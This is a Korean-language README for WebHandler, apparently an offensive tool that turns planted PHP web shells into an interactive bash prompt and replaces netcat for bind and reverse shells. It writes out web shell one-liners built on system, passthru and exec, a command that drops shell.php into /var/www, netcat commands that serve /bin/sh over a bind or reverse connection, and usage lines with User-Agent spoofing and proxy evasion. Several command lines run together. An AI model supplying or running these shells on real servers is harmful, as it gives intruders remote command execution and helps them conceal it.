
PHP 시스템 함수를 사용하여 서버를 제어하는 Bash 시뮬레이터
PHP 시스템 함수를 위한 핸들러이자 'netcat' 대체 핸들러
WebHandler는 'Linux bash 프롬프트'를 시뮬레이션하여 다음을 처리합니다:
- PHP 프로그램 실행 함수 _(예: `system`, `passthru`, `exec` 등)_
- 바인드 셸 연결
- 리버스 셸 연결
또 다른 기능은 HTTP 헤더의 "User-Agent" 필드를 스푸핑하는 것입니다. (--random-angent).
HTTP 프록시도 지원합니다 (--proxy http://<ip>:<port>)
WebHandler는 POST 및 GET 요청을 지원합니다:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>WebHandler는 netcat 연결의 대체 수단입니다.
바인드 연결 예시 (예: nc -lvvp 1234 -e /bin/sh)
일반적으로 사용자는 다음과 같이 실행합니다:
netcat -l -p 1234nc -lvvp 1234리버스 연결 예시 (예: nc 127.0.0.1 4321 -e /bin/sh)
일반적으로 사용자는 다음과 같이 실행합니다:
netcat -l -p 4321nc -lvvp 4321--예제 파일:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url은 GET 또는 POST 요청을 보낼 때 필수 인자입니다 (예: '웹 기반 PHP' 바인드 연결):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen은 연결을 기다릴 때 필수 인자입니다 (예: 리버스 'raw' 연결):
python webhandler.py --listen 1234Python 버전이 2.7.x 미만인 경우 argparse 가 필요합니다
설치하려면 다음을 실행하세요: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse 또는 sudo pip --install argparse.
readline 은 선택 사항입니다. 이 모듈은 정교한 줄 편집 및 기록 기능을 제공하는 데 사용됩니다
git 은 선택 사항입니다. 이를 통해 프로젝트를 최신 상태로 유지할 수 있습니다